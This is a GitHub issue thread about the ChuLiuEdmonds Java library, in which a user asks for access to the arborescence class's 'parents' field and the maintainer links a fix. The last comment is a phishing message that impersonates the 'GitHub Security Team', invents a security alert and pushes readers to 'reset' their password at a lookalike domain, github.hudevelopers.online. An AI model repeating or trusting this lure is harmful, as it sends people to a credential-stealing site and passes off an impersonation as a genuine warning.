### ISSUE TITLE
parent field not accessible in arborescence class

### ISSUE THREAD

**Issue by shyamupa** [sammthomson/ChuLiuEdmonds#1]
Hi,

I am using your code to obtain max arborescence, but the field parent in your arborescence class is not public. For eg., I cannot do the following (taken from the test code for Chu-Liu-Edmonds)

`
final Map<Integer, Integer> maxBranching = weightedSpanningTree.val.parents;
`

Please provide a method to access the parents field. 

Thanks

**Comment by sammthomson** [comment]
fixed in https://github.com/sammthomson/ChuLiuEdmonds/commit/8826522449d4d64edca810134979f55ead25fd08

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
